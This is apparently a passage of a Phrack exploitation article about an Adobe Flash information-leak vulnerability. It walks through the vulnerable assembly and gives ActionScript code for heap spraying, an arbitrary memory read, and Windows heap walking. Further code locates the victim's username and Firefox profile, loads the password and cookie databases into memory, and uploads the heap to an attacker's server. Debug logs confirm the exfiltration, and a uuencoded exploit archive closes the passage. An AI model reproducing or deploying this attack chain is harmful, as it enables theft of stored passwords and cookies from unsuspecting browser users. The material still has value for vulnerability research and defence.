by calling `getABRProfileInfoAtIndex()' as shown below:


--- snip ---
source.getABRProfileInfoAtIndex(0, 0xdeadbeef);
--- snip ---


Here's what's going on under the hood. The presented assembly snippet was
taken from "NPSWF32_15_0_0_189.dll".


--- snip ---
; This is `getABRProfileInfoAtIndex()' entry point
sub_102354CC proc near
    ...
    xor     ebx, ebx

    ...
    mov     eax, [eax+40h]
    mov     ecx, [ebp+arg_4]    ; Profile index controlled by the attacker
    mov     esi, [eax+ecx*4]    ; Read pointer to AVABRProfileInfo (1)
    cmp     esi, ebx
    jnz     short loc_10235525

loc_10235525:
    ...
    push    dword ptr [esi+8]  ; Read 3 doublewords from `esi' (2)
    push    dword ptr [esi+4]
    push    dword ptr [esi]

loc_1023553E:
    ...
    call    sub_102347FC       ; AVABRProfileInfo constructor

loc_1023554D:
    pop     edi
    pop     ebx
    leave
    retn    8                  ; Return AVABRProfileInfo
sub_102354CC endp
--- snip ---


Argument `arg_4' is `abrProfileIndex' shown the API's definition and is
fully controlled by the attacker. As it can be seen from the above assembly
snippet, the integer passed to this method at (1) is not checked and it's
used to access an array of pointers to `AVABRProfileInfo' instances each
representing an available ABR profile specified in the loaded HLS manifest.
A pointer is read from the memory address at "[EAX + abrProfileInfo * 4]"
and stored in ESI. This pointer is then dereferenced 3 times at (2) to read
three doublewords. All three of them are leaked back to the user as part of
the returned `AVABRProfileInfo' instance. Accessing the leaked memory is
just a matter of doing the following:


--- snip ---
// Our `Console' class defined in a previous section
var con:Console = new Console(this);
var info:AVABRProfileInfo = source.getABRProfileInfoAtIndex(0, 0xdeadbeef);

// Print leaked values in hexadecimal format.
con.msg(info.width.toString(16));
con.msg(info.height.toString(16));
con.msg(info.bitrate.toString(16));
--- snip ---


----[ 3.2 Exploitation

------[ 3.2.1 Assessment

The following C++ pseudocode gives an oversimplified model for the
aforementioned vulnerability.


--- snip ---
struct ABRProfileInfo
{
    uint32_t width;
    uint32_t height;
    uint32_t bitrate;
};

class AVSegmentedSource
{
    private:
        struct ABRProfileInfo *profiles[];
        ...

    public:
        struct ABRProfileInfo *getABRProfileInfoAtIndex(int, int);
        ...
};

struct ABRProfileInfo *AVSegmentedSource::getABRProfileInfoAtIndex(int i,
        int j)
{
    ...
    return this->profiles[j];
}


AVSegmentedSource *source = new AVSegmentedSource();
AVABRProfileInfo *info;
...

info = source->getABRProfileInfoAtIndex(i, j);
printf("%x %x %x\n", info->width, info->height, info->bitrate);
--- snip ---


To successfully exploit this vulnerability an attacker will have to provide
a number `j', the second argument to `getABRProfileInfoAtIndex(), such that
`&profiles[j]' happens to fall on a mapped memory address, say 0x11111111,
and the doubleword at this location holds a valid pointer to an
`ABRProfileInfo' structure, say 0x22222222. If these conditions are met,
the call to the vulnerable API will complete successfully and the attacker
will be given back the three doublewords at 0x22222222 (member `width'),
0x22222222+4 (member `height') and 0x22222222+8 (member `bitrate') in the
returned `ABRProfileInfo' structure. Assuming the attacker, somehow,
controls the doubleword at 0x11111111, he or she can then leak three
doublewords from an arbitrary memory address by first assigning the victim
memory address at 0x11111111 and then triggering the vulnerability.

The following figure shows the relationship between the various structures
described so far.


+------+         +--------------+         +---------+
| this |-------->| *profiles[0] |-------->| width   |
+------+         +--------------+         +---------+
                 | *profiles[1] |----+    | height  |
                 +--------------+    |    +---------+
                 .              .    |    | bitrate |
                 .              .    |    +---------+
                 .              .    |
                 +--------------+    |         +---------+
                 | *profiles[N] |    .-------->| width   |
                 +--------------+              +---------+
                                               | height  |
                                               +---------+
                                               | bitrate |
                                               +---------+


So far so good. However, assuming the attacker has no information regarding
the virtual memory layout of the victim Flash process, there's no guarantee
that for an arbitrary number `j', `&profiles[j]' will, in fact, be a mapped
memory address. For the following we are going to make the assumption that
the attacker has no information regarding the state of the Adobe Flash
process and has no way of gaining insight about it. That is, we are going
to assume that the presented vulnerability is the only vulnerability the
attacker has knowledge about and thus no safe assumptions can be made about
the value of `j'.


------[ 3.2.2 From relative to absolute information leak

Ideally, one would attempt to place controlled data, a string for example,
right next to the `profiles[]' array using well known and studied heap
shaping techniques. Then, with a properly chosen value for `j',
`&profiles[j]' would fall on the aformentioned controlled data region,
resulting in total control on the address from where data will be leaked
back to the attacker. This is definitely a good way to go, however the
exploit attached in this article uses a different technique. Unfortunately,
several years have passed since I discovered this vulnerability and I don't
recall reason why I didn't follow this technique. IIRC `profiles[]' was not
in the AVM managed heap and it was thus hard to control the heap contents
right next to it. Hard, but not impossible I guess.

Probably not the best strategy, but one that works, is to spray the heap
with a few very large vectors of unsigned integers, hoping that a high
memory address is reached and that this address holds user supplied data.
The attached exploit allocates 64 such vectors, 0x01000000 bytes in size
each, and the high address in question is assumed to be 0x0a000000, but
that's an arbitrary choice, any high address properly chosen will do. It
should be noted that the heap spray vectors should be filled with a
doubleword value corresponding to the chosen high address, that is, in our
case, we should set all elements of all vectors to 0x0a000000 for reasons
that will become apparent later.

Since a great deal of the memory space is filled with our vectors,
supplying a quite large value for `j' has a good chance of making
`&profiles[j]' to fall within one of the heap sprayed regions. The exploit
will first attempt to leak a doubleword from `&profiles[0x01000000]'. A
leaked value of 0x0a000000 is an indication that the heap spray has
succeeded.


--- snip ---
private const VECNUM:uint = 64;
private const VECSZ:uint = 0x01000000 / 4 - 2;
...

private function _do_heap_spray():void
{
    var v:Vector.<uint>;
    this._sv = new Vector.<*>(this.VECNUM);
    for(var i:uint = 0; i < this.VECNUM; i++)
    {
        v = new Vector.<uint>(this.VECSZ);
        for(var j:uint = 0; j < this.VECSZ; j++)
            v[j] = 0x0a000000;
        this._sv[i] = v;
    }
}
--- snip ---


One might wonder why spraying the heap with just a few very large vectors
may be better, as opposed to spraying with a large number of smaller
vectors. Usually, we need to decrease the metadata to data ratio. The more
vectors we instantiate the more metadata are allocated in the victim
process' GC heap, the AVM managed heap. However, by allocating only a few
very large vectors we can make sure heap space is mostly filled with user
supplied unsigned integers and only a few bytes of metadata is used.

The underlying C++ vector objects hold a pointer to a memory region that
holds the actual data (for more information see [18]). This memory region
has the following format.


https://github.com/adobe-flash/avmplus/blob/master/core/avmplusList.h#L83

--- snip ---
template<class STORAGE, uint32_t slop> struct ListData
{
    uint32_t len;
    MMgc::GC* _gc;
    STORAGE entries[1];
};
--- snip ---


While writing this article, the author came across the following GitHub
repository, which was recently updated by Adobe! In this new version of
"avmplus", the layout of the structure shown above has changed and
XOR-based overflow protection has been added.

https://github.com/adobe/avmplus/blob/master/core/avmplusList.h#L83


Now, let's assume that our heap spraying results in the partial memory
layout depicted in the following figure.


    0x0a000000 - X     0x01000000 0x22222222 0x0a000000 0x0a000000
    ...
    0x0a000000         0x0a000000 0x0a000000 0x0a000000 0x0a000000
    0x0a000010         0x0a000000 0x0a000000 0x0a000000 0x0a000000
    0x0a000020         0x0a000000 0x0a000000 0x0a000000 0x0a000000
    0x0a000030         0x0a000000 0x0a000000 0x0a000000 0x0a000000
    ...
    0x0a000000 + Y     0x0a000000 0x0a000000 0x0a000000 0x0a000000


As it was previously mentioned, the exploit assumes that heap spraying
results in address 0x0a000000, an otherwise randomly chosen high heap
address, falling within the container memory region of one of the 64 large
vectors. This is depicted in the above schematic where address 0x0a000000
contains 0x0a000000, the value assigned in all vectors' elements. Notice
that, in this case, dereferencing memory address 0x0a000000 returns
0x0a000000, the memory address itself. Let's assume that, for a quite large
value of `j', say `j = 0x01000000', `&profiles[j]' happens to fall at
`0x0a000000 + Y', then `profiles[j] = 0x0a000000' and consequently three
doublewords will be leaked from 0x0a000000. So far, so good.

By repeatedly calling `getABRProfileInfoAtIndex()' with decreasing values
of `j', `&profiles[j]' will eventually point to `0x0a000000 - X + 4',
`profiles[j]' will be equal to `0x22222222' and three doublewords will be
leaked from that address. However, recall that this is the address of a C++
object (`_gc' member in `ListData' shown above), and consequently the first
leaked doubleword will hold the object's virtual function table address.
Additionally, `&profiles[j + 1]' is the pointer to the first element of the
same container memory region. Notice that we don't know, and we shouldn't
care, which of the 64 vectors this container belongs to.

We now have two assets at hand:

  * A virtual function table pointer which can be used to determine the
    Flash Player module base address.

  * An easy way of reading arbitrary memory addresses. For each vector `v'
    in the set of spray vectors, se set `v[0] = 0xdeadbeef' and call
    `getABRProfileInfoAtIndex()' passing the aforementioned `j + 1' value
    as the second argument. This will result in 3 doublewords being leaked
    from 0xdeadbeef.

All this may be confusing even if you are the most experienced exploit
writer in the world. Take your time and think about it.

The following function in "WorkerMain.as" implements the logic described so
far. When it completes, `this._idx' is the value of `j + 1', and
`this._vtable_address' is the leaked address of the C++ object's virtual
function table.


--- snip ---
private function _get_vtable_and_index():Boolean
{
    var ret:Boolean = false;
    var pi:AVABRProfileInfo;
    var idx:uint = 0x01000000;

    // If the first attempt to leak data returns 0, then we have either
    // landed on an invalid heap address (i.e. not covered by any of the
    // large vectors), or we're running on a very old Flash Player that
    // doesn't support HLS streaming.
    pi = this._source.getABRProfileInfoAtIndex(0, idx);
    if(pi.bitsPerSecond != 0)
    {
        while(pi.bitsPerSecond == 0x0a000000)
        {
            idx -= 1;
            pi = this._source.getABRProfileInfoAtIndex(0, idx);
        }
        this._idx = idx + 1;
        this._vtable_address = pi.bitsPerSecond;
        ret = true;
    }
    return ret;
}
--- snip ---


Reading a doubleword from an arbitrary address, it's then just a matter of
calling the function below (also defined in "WorkerMain.as").


--- snip ---
// Read a doubleword from the given memory address.
private function _read_dword(addr:uint):uint
{
    var pi:AVABRProfileInfo;
    var ret:uint;
    ...

    // (1)
    for(var i:uint = 0; i < this.VECNUM; i++)
        this._sv[i][0] = addr;

    // (2)
    pi = this._source.getABRProfileInfoAtIndex(0, this._idx);

    ...
    ret = pi.bitsPerSecond;

    return ret;
}
--- snip ---


At (1) we iterate over the 64 heap spray vectors and set their first
element to the address from where we want to read a doubleword. We then
call the vulnerable API, at (2), with the appropriate second argument that
results in some vector's first element being dereferenced as a memory
address. The value in `pi.bitsPerSecond' returns the leaked value.

Moving one level up in the abstraction layers, the following function,
implemented on top of `_read_dword()' given above, can be used to read
arbitrary amounts of data from a given memory address. Its usefulness will
become apparent later, but you can pretty much guess.


--- snip ---
// Read an arbitrary amount of bytes starting from the given memory
// address. Note that we can't read less than 4 bytes at a time, so,
// less than `len' bytes may be returned.
private function _read(addr:uint, len:uint):String
{
    var dw:uint;
    var raw:String = "";

    // Align at a multiple of 4 (_downwards_, _not_ upwards) and then
    // subtract the number of bytes dereferenced every time the bug is
    // triggered. We do that in an attempt to avoid hitting unmapped
    // memory regions.
    len = len & ~3;
    if(this._readahead > 0)
        len -= this._readahead;

    for(var i:uint = 0; i < (len & ~3); i += 4, addr += 4)
    {
        dw = this._read_dword(addr);
        raw += String.fromCharCode(dw & 0x000000ff) +
            String.fromCharCode((dw & 0x0000ff00) >>> 8) +
            String.fromCharCode((dw & 0x00ff0000) >>> 16) +
            String.fromCharCode((dw & 0xff000000) >>> 24);
    }

    return raw;
}
--- snip ---


------[ 3.2.3 Discovering Flash Player base address

As it was mentioned in 3.2.2, method `_get_vtable_and_index()', among other
things, returns the address of a virtual function table discovered during
the early steps of the exploit. Computing the base address of the Adobe
Flash Player plug-in is now a matter of aligning the virtual table address
to the previous multiple of the page size, reading a doubleword from that
location and checking if the "MZ" signature (0x5a4d) is there. If not,
0x1000 is subtracted from the address in question and the process is
repeated. Method `_get_flash_address()' in "WorkerMain.as" implements the
logic described in this paragraph.


--- snip ---
// Attempt to locate the Flash Player base address.
private function _get_flash_address():void
{
    var addr:uint = this._vtable_address & 0xfffff000;
    var dw:uint;

    dw = this._read_dword(addr);
    while((dw & 0x0000ffff) != 0x00005a4d)
    {
        addr -= 0x1000;
        dw = this._read_dword(addr);
    }
    this._flash_address = addr;
}
--- snip ---


When `_get_flash_address()' completes, `this._flash_address' will hold the
base address of the Adobe Flash Player plug-in.


------[ 3.2.4 Discovering the CRT heap address

Being able to to read doublewords from arbitrary memory addresses, means
one can easily locate the address of the Microsoft Windows heap used by the
Adobe Flash plug-in process. The following assembly snippet can be found in
`__heap_init()', a function found in most PE executables' early
initialization code.


--- snip ---
call    ds:HeapCreate
mov     __crtheap, eax
--- snip ---


The variable named `__crtheap' is a global holding a `HANDLE' to the CRT
heap. However, heap `HANDLE' values are, in fact, heap base addresses. An
attacker may exploit the information leak vulnerability to read the
contents of this global variable and discover the sandboxed child's CRT
heap base address. Taking into account the information presented in the
previous sections, it's quite trivial to achieve this:

  * Set `v[0] = &__crtheap' for each heap spray vector `v'.

  * Trigger the vulnerability by calling `getABRProfileInfoAtIndex()'.

The value of `&__crtheap' can easily be located by searching the Flash
plug-in's text segment for the following byte pattern. The wildcards marked
with "??" correspond to the address of `HeapCreate()'. The doubleword that
follows this pattern is `&__crtheap'.

    68 00 10 00 00 50 ff 15 ?? ?? ?? ?? a3

The following function, found in the exploit's "WorkerMain.as", is
responsible for discovering the CRT heap address. It makes use of
`this._read_dword()', the function that abstracts the vulnerability details
away and allows the AS3 programmer to read data from arbitrary memory
addresses.


--- snip ---
// Locate the address of `__crtheap', the variable that points to the
// process' main heap, and dereference it to read the heap's address.
private function _get_heap_address():void
{
    var match:RegExp = /\x68\x00\x10\x00\x00\x50\xff\x15....\xa3/;
    var addr:uint = this._flash_address;
    var raw:String;
    var i:int;

    raw = this._read(addr, 0x1000)
    while((i = raw.search(match)) < 0)
    {
        addr += 0x1000;
        raw = this._read(addr, 0x1000)
    }

    addr += i + 13;
    addr = this._read_dword(addr);
    this._heap_address = this._read_dword(addr);
    this._parser = new CRTHeapParser(this._read_dword);
}
--- snip ---


With this in hand, one may walk all heap allocations and read all data
reachable in the heap at the time the exploit executes. Notice that, the
GC heap, Adobe Flash's own heap allocator, acts on top of the Microsoft
Windows CRT heap.


------[ 3.2.5 Walking CRT heap allocations

Once the CRT heap address has been leaked, walking the whole heap is pretty
straightforward. Luckily for an attacker, Chris Valasek and Tarjei Mandt
have done a great work at documenting the Microsoft Windows heap internals
([13], [14], [15]).

The Windows heap parsing logic is implemented in "CRTHeapParser.as" in
class `CRTHeapParser'. The class is quite abstract, the reader can use it
in any information leak vulnerability. It effectively implements the
equivalent of `HeapWalk()' in AS3. The constructor expects a single
argument, a function used to read a doubleword from an arbitrary memory
address (see the definition of `_read_dword()' later in this section).


--- snip ---
this._parser = new CRTHeapParser(this._read_dword);
--- snip ---


Once a `CRTHeapParser' instance has been created, the heap can be walked
using the method `walk()' as shown below:


--- snip ---
this._parser.walk(this._heap_address, this._get_username_cb);
--- snip ---


The first argument is the address of heap to walk (a Windows application
may have more than one heap) while the second is a callback to call for
each discovered heap allocation. The name of the shown callback function
will be explained later.


--- snip ---
private function _get_username_cb(address:uint, size:uint):Boolean
{
    ...
}
--- snip ---


The callback receives two arguments. The address of a heap allocation and
the allocation size. It's up to the callback implementer to read the
contents of this heap allocation (using the information leak exploit) and
discover its contents.


--- snip ---
// Read a doubleword from the given memory address.
private function _read_dword(addr:uint):uint
{
    var pi:AVABRProfileInfo;
    var ret:uint;

    // Check if the readahead crosses a page boundary. If yes, then the
    // next page may be unmapped.
    var cross_page:Boolean = ((addr + this._readahead) & 0xfffff000) !=
        (addr & 0xfffff000);

    // If so, subtract the readahead from the address to be dereferenced
    // and return `pi.height' instead of `pi.bitsPerSecond' :)
    if(cross_page && this._readahead > 0)
        addr -= this._readahead;

    for(var i:uint = 0; i < this.VECNUM; i++)
        this._sv[i][0] = addr;
    pi = this._source.getABRProfileInfoAtIndex(0, this._idx);

    if(cross_page && this._readahead > 0)
        ret = pi.height;
    else
        ret = pi.bitsPerSecond;

    return ret;
}
--- snip ---


As it has already been mentioned, the above is, actually, the equivalent of
`HeapWalk()' [19] implemented by abusing our read primitive.


------[ 3.2.6 Reading arbitrary files

Now that we have a powerful arbitrary read primitive at hand, it's time we
examine what can be done with it. An obvious potential is dumping the
memory contents of the sandboxed Adobe Flash Player process. However,
unless sensitive information is already present in the process' memory,
doing this won't yield any interesting results.

What if one could force the sandboxed child load and map arbitrary files in
memory? Assuming a file has been mapped somewhere in the process' heap,
discovering its contents is just a matter of walking the heap and locating
the heap region that carries the contents of the file.

The M3U8 specification mentions the following:


    3.4.4. EXT-X-KEY

    Media segments MAY be encrypted. The EXT-X-KEY tag specifies how to
    decrypt them. It applies to every media URI that appears between it and
    the next EXT-X-KEY tag in the Playlist file (if any). Its format is:

    #EXT-X-KEY:<attribute-list>

    ...

    If the encryption method is AES-128, the URI attribute MUST be present.

    ...

    The URI attribute specifies how to obtain the key. Its value is a
    quoted-string that contains a URI [RFC3986] for the key.


If the URI specifies a local file, the Flash Player child will happily load
and map it in memory (it's well known that the NPAPI Firefox Flash Sandbox
allows reading arbitrary files from the filesystem). A relatively big file
will occupy a heap segment of its own, making it easier for an attacker to
discover its contents.

Ideally, an attacker would like to load in memory the SQLite database
holding the Firefox stored passwords. However, this is not as
straightforward as it may sound at first. On Microsoft Windows, these
databases reside at the following location:


C:\Users\USERNAME\AppData\Roaming\Mozilla\Firefox\Profiles\PROFILE_NAME\
    signons.sqlite


The path above contains two unknown quantities, the victim's username and
the Firefox profile name which is a random identifier produced during
installation. Before being able to load these files, one needs to find a
way to determine the unknown values first.

Since we already have an arbitrary read, as well as a more advanced heap
walking abstraction, at hand, figuring out the victim's username is quite
easy. On Microsoft Windows, environment variables lie somewhere at the very
beginning of the process heap, so, our heap walker will visit this
allocation too. Assuming we have successfully leaked the address of the
main heap as described above, leaking the victim's username as simple as
calling `walk()' with a callback function that uses regular expressions to
locate the string ":\Users\xxx\AppData" in the heap data.


--- snip ---
// Leak heap data and look for a pattern that matches the username in
// the target system. We need that in order to access files within the
// user's home directory.
private function _get_username_cb(address:uint, size:uint):Boolean
{
    var matches:Array;
    var ret:Boolean = false;

    // `_read()' is the function implementing the read primitive.
    var raw:String = this._read(address, size);

    matches = raw.match(/:\\Users\\([^\\]*)\\AppData/);
    if(matches != null)
    {
       this._username = matches[1];
       ret = true;
    }
    return ret;
}

private function _get_username():Boolean
{
    return this._parser.walk(this._heap_address, this._get_username_cb);
}
--- snip ---


If `_get_username_cb()' succeeds, the leaked username is stored in
`this._username'.

This whole process may be repeated to first load "profiles.ini", the file
that holds the randomly generated Mozilla Firefox profile name and then the
SQLite databases holding the keys and passwords. The content's of the
aforementioned files can then be dumped using `this._parser.walk()' with
different callback methods as shown below.


--- snip ---
// Search for the random Firefox profile name in heap data.
private function _get_profile_name_cb(address:uint, size:uint):Boolean
{
    var matches:Array;
    var ret:Boolean = false;
    var raw:String = this._read(address, size);
    matches = raw.match(/Path=Profiles[\/\\]([[:print:]]+)/);
    if(matches != null)
    {
       this._profile_name = matches[1];
       ret = true;
    }
    return ret;
}

private function _get_profile_name():Boolean
{
    ...

    this._parser.walk(this._heap_address, this._get_profile_name_cb);
    ...
}
--- snip ---


Last but not least, the `_upload_data_cb()' is used in a final call to
`walk()' to upload the full heap contents to a server of the attacker's
choosing:


--- snip ---
// Collects data and uploads it on our server.
private function _upload_data_cb(address:uint, size:uint):Boolean
{
    var raw:String = this._read(address, size);

    if(this._mem == null)
        this._mem = "";
    this._mem += raw;

    // Upload data in blocks of `DUMPSZ' bytes.
    if(this._mem.length >= this.DUMPSZ)
    {
        this._con.msg("Uploading block of " + this._mem.length + " bytes");

        var b64:Base64Encoder = new Base64Encoder();
        b64.encode(raw);
        raw = b64.toString();

        var vars:URLVariables = new URLVariables();
        vars.id = this._get_uniqid();
        vars.data = raw;

        var req:URLRequest = new URLRequest(this.DUMPURL);
        req.data = vars;
        req.method = URLRequestMethod.POST;

        var ldr:URLLoader = new URLLoader();
        ldr.dataFormat = URLLoaderDataFormat.BINARY;
        ldr.load(req);

        this._mem = "";
    }

    // Return `false' so that `parser.walk()' walks the whole heap.
    return false;
}

private function _steal_cookies_and_passwords():void
{
    ...

    // Dump the whole heap :)
    this._parser.walk(this._heap_address, this._upload_data_cb);
}
--- snip ---


The exploit's server component "dumper.php" will store the uploaded data in
a file under "/tmp". Section 3.2.8, entitled "Logs", proves that the SQLite
databases holding keys and passwords have succesfully been uploaded to the
attacker's server.


------[ 3.2.7 - Overall exploit methodology

Summing up, the complete exploitation process consists of the steps given
below. The interested reader is referred to the corresponding sections of
this article for a detailed analysis of each step. Briefly the attached
exploit:

  * Performs some standard heap spraying and attempts to determine if it
    was successful or not.

  * Abuses the layout of AS3 `Vector<uint>' data containers to leak
    information from arbitrary absolute memory addresses. In this step, the
    address of a virtual function table is also discovered.

  * Discovers the Adobe Flash plug-in's base address.

  * Walks the CRT heap once to locate the environment variables of the
    victim process. Simple pattern matching is used to locate the username
    of the victim.

  * Asks the exploit's server component to return an M3U8 manifest that
    results in the AVM loading "profiles.ini" several times in the victim
    process memory.

  * Walks the CRT heap once again to locate "profiles.ini" contents and
    read the name of the default profile. Most (all) users use just a
    single Firefox profile.

  * Asks the exploit's server component to return an M3U8 manifest that
    loads "signons.sqlite", "key3.db" and "cookies.sqlite" in the victim's
    memory.

  * Walks the CRT heap again and uploads all heap allocations to a server
    of the attacker's choosing. Some of these allocations contain the
    SQLite database contents.

The author has run several experiments and has verified that the above
exploitation works as expected.


------[  3.2.8 - Logz

This is how the user's browser looks like when debugging output is enabled
in the exploit's code:

--- snip ---
(2016-01-26 01:04:42) [*] Will now load worker from WorkerMain.swf
(2016-01-26 01:04:42) [*] New worker started
(2016-01-26 01:04:42) [*] Preparing stream
(2016-01-26 01:04:54) [*] Readahead size is 8
(2016-01-26 01:04:54) [*] Spraying the heap
(2016-01-26 01:04:56) [*] GC virtual table @0x67cadaf0
(2016-01-26 01:04:56) [*] Flash player base address @0x67010000
(2016-01-26 01:05:07) [*] __crtheap @0x4e0000
(2016-01-26 01:05:07) [*] Matched Windows username "huku"
(2016-01-26 01:05:07) [*] Preparing to leak Firefox profile name
(2016-01-26 01:05:07) [*] New manifest "\\192.168.0.200@80\tmp\
    master-6c616c616b6973--99643158.m3u8"
(2016-01-26 01:05:07) [*] Sleeping for a while...
(2016-01-26 01:05:19) [*] Matched Mozilla Firefox profile name
    "liqso3kl.default"
(2016-01-26 01:05:19) [*] Preparing to steal cookies and passwords
(2016-01-26 01:05:19) [*] New manifest "\\192.168.0.200@80\tmp\
    master-6c616c616b6973-6c6971736f336b6c2e64656661756c74-efa5759b.m3u8"
(2016-01-26 01:05:19) [*] Sleeping for a while...
(2016-01-26 01:05:31) [*] Uploading block of 54040 bytes
(2016-01-26 01:05:32) [*] Uploading block of 383168 bytes
(2016-01-26 01:05:32) [*] Uploading block of 33544 bytes
(2016-01-26 01:05:32) [*] Uploading block of 36096 bytes
(2016-01-26 01:05:32) [*] Uploading block of 36280 bytes
(2016-01-26 01:05:32) [*] Uploading block of 97608 bytes
(2016-01-26 01:05:32) [*] Uploading block of 34976 bytes
(2016-01-26 01:05:32) [*] Uploading block of 131064 bytes
(2016-01-26 01:05:32) [*] Uploading block of 36768 bytes
(2016-01-26 01:05:32) [*] Uploading block of 41976 bytes
(2016-01-26 01:05:32) [*] Uploading block of 40960 bytes
(2016-01-26 01:05:32) [*] Uploading block of 40960 bytes
(2016-01-26 01:05:32) [*] Uploading block of 42336 bytes
(2016-01-26 01:05:33) [*] Uploading block of 131064 bytes
(2016-01-26 01:05:33) [*] Uploading block of 36856 bytes
(2016-01-26 01:05:33) [*] Uploading block of 32768 bytes
(2016-01-26 01:05:33) [*] Uploading block of 36856 bytes
(2016-01-26 01:05:33) [*] Uploading block of 32768 bytes
(2016-01-26 01:05:33) [*] Uploading block of 32768 bytes
(2016-01-26 01:05:33) [*] Uploading block of 32768 bytes
(2016-01-26 01:05:33) [*] Uploading block of 32768 bytes
(2016-01-26 01:05:33) [*] Uploading block of 32768 bytes
(2016-01-26 01:05:33) [*] Uploading block of 32768 bytes
(2016-01-26 01:05:33) [*] Uploading block of 32768 bytes
(2016-01-26 01:05:33) [*] Uploading block of 32768 bytes
(2016-01-26 01:05:33) [*] Uploading block of 107296 bytes
(2016-01-26 01:05:33) [*] Uploading block of 44232 bytes
(2016-01-26 01:05:34) [*] Uploading block of 528400 bytes
(2016-01-26 01:05:34) [*] Uploading block of 528376 bytes
(2016-01-26 01:05:35) [*] Uploading block of 528376 bytes
(2016-01-26 01:05:35) [*] Freeing worker resources
(2016-01-26 01:05:35) [*] Marking target
(2016-01-26 01:05:35) [*] Done
--- snip ---


On the attacker's server, a binary file holding exfiltrated data is created
in "/tmp". The SQLite databases holding the victim's keys and passwords can
also be found there.


--- snip ---
$ hexdump -C /tmp/154a61b6c8227ae0acfdfb974141dd6f.bin | grep SQLite
...  d0 c5 37 4e 00 00 00 04  53 51 4c 69 74 65 20 66  |..7N....SQLite f|
...  d0 c5 37 4e 00 00 00 04  53 51 4c 69 74 65 20 66  |..7N....SQLite f|
--- snip ---


--[ 4 - Conclusion

The author hopes to have presented an interesting technique of exfiltrating
data from a victim's computer. The only requirement was an arbitrary read
primitive achieved by exploiting a standard relative information leak
vulnerability. The presented methodology is generic and may be used to
exploit similar Adobe Flash vulnerabilities. Additionally, similar
techniques may be applicable to other client side technologies.

Vulnerabilities, uninteresting at first sight, just like this one, may turn
out to be promising and effective. Once a victim's passwords have been
stolen (e.g. e-mail credentials), accessing the target's computer or mobile
devices may also be possible in post-exploitation scenarios.

As we are moving towards the era of data-only attacks, both in user-land
and kernel-land, such attacks may become more and more interesting from a
security researchers perspective. We look forward to bypassing any crappy
mitigation that will be implemented in future Adobe Flash versions.


--[ 5 - Thanks

As you might know, writing a Phrack article is quite a hard work and
requires dedication. This paper would have never been completed if it
wasn't for the help and support of certain people. This section is
dedicated to them.

First and foremost I would like to thank the Phrack Staff for kicking my
ass and motivating me to write this article. In a world of conferences and
fame, Phrack has managed to stay alive with original and impressive
content. It was the least I could to do help. It's always an honor for me
seeing my articles published in Phrack.

I would like to thank nemo and argp for their suggestions and insightful
comments. My thanks also go to my team at CENSUS (and a couple of other
persons who would like to remain anonymous) for giving me the chance to
work on this cool stuff and spend time on Adobe Flash internals. It's
always cool to be in a team where "client side exploitation" means
arbitrary code execution and not XSS :)

Chris Valasek and Tarjei Mandt for their work on Windows heap allocators.
Life would have been harder without their work.

Last but not least, greetings fly to my grhack.net collegues and !fapperz
;)


--[ 6 - References

  [01] http://www.zerodayinitiative.com/advisories/ZDI-15-007/
  [02] https://twitter.com/kernelbof/status/629832855842091008
  [03] http://www.cvedetails.com/top-50-products.php
  [04] https://blog.zimperium.com/
    stagefright-vulnerability-details-stagefright-detector-tool-released/
  [05] http://flex.apache.org/installer.html
  [06] http://www.adobe.com/devnet/flex/flex-sdk-download.html
  [07] http://www.w3.org/TR/webstorage/
  [08] http://www.w3.org/TR/webdatabase/
  [09] http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/
    flash/external/ExternalInterface.html
  [10] http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/
    flash/net/SharedObject.html
  [11] https://en.wikipedia.org/wiki/HTTP_Live_Streaming
  [11] http://tools.ietf.org/html/draft-pantos-http-live-streaming-08
  [12] https://msdn.microsoft.com/en-us/library/windows/desktop/
    aa366710(v=vs.85).aspx
  [13] http://www.azimuthsecurity.com/resources/bh2009_mcdonald_valasek.pdf
  [14] http://illmatics.com/Understanding_the_LFH.pdf
  [15] http://illmatics.com/Windows%208%20Heap%20Internals.pdf
  [16] https://developer.apple.com/library/ios/technotes/tn2288/_index.html
  [17] https://www.adobe.com/support/flashplayer/debug_downloads.html
  [18] https://0b3dcaf9-a-62cb3a1a-s-sites.googlegroups.com/site/
    zerodayresearch/smashing_the_heap_with_vector_Li.pdf
  [19] https://msdn.microsoft.com/en-us/library/windows/desktop/
    aa366710(v=vs.85).aspx
  [20] http://haxe.org


--[ 7 - Codez

begin 644 flash_hardcode_porn.tgz
M'XL(`%A6X58``^U]_6,:-])P?RU_A4I]!SBP@(T='PEI79LD?NNOQSA->B9'
M%E:8/2^[='<Q]EW[_.WOS$C[K06<^-+VN:B-@5UI)(UF1J/1:#2V=&\RF.BN
M,7(,/I@YKEW_ZI%3H]%XNM-@^`DI_2E^-+=VGS:V=K8;V]NLT=QI;N]\Q78>
MNR&J-/=\W86FN([C+\NWF'!N+7F?[MR?)(T5XW_@V)YC<4WW'J<.P,=N*W_\
MGVYOM8+QWWK::,'X/VT\??H5:SQ.]<O3?_GXS_31C7[-"_\N,$CF%`C`9T04
MFF%Z,TN_UP[%Y]GPGWSD`VWXNFES]UFV@,_O?.T2_KPTN64LS>"X4]U7Y+BV
MG*%NF?_2?=.QM4/=YY?FE(OLOK)2?LMMW].Z^*%X;7-?>W=RW'-&-USUWKOW
M?#[5WCKNC1*\?'_"/0_0=##1;9M;SPH%RCF;#RUSQ$:0TV.2:^B%P":F>IV=
MNZ;MLZF`X#'?83H#HK,-8#J&*&%CQ)<6EIFYYBWTG(T`HL^.SP[VCP>'W1_>
MO&K_X$`-NLTZS'?G_%DA7@T@:8$0XQ6Y?.H`H(GC^1H[F[OPS+&JS-:GW&#%
MNZGE$5X,;79?K#+3B\/SYK.9XT$^@#/D;*&;OFE?,W_"7<[&CLM,>^1,\1&T
MTP;2@!'S\CIQT3TYN^QF>C'6+8\_6U[F]5GOLMWS7:RIPXI-;4O;UEK%%:7.
MSRXNVXCW#HB6[58P8O'\M[K+!N.IW\XALTQ>_\YOI\@[DT?BM)VBN;Q\@U_:
M/P'J'%=[+KKX(B?_=-16TV`P^M;<F^"@3SB#NID8V(`8V"]S/N<:>VFZ,*#S
M&0-I9J?RQJ%%(PI$P3A0*Q`ZP%<0Z7ANBXP#QQ[(<F5^Z[>)(ROM6\<TPD(1
M7V!:3$R+E_V)Z6D1/C2+V]?^A+U@C4HB-Z9$7LWCMI$I[DW,L5^N5"(\_A8?
M>\&Q8:,ETY:=!8BTMEK257*:+VH&`@(:L_F"9<BH7.3VX$VO&&M+HAQTP`\*
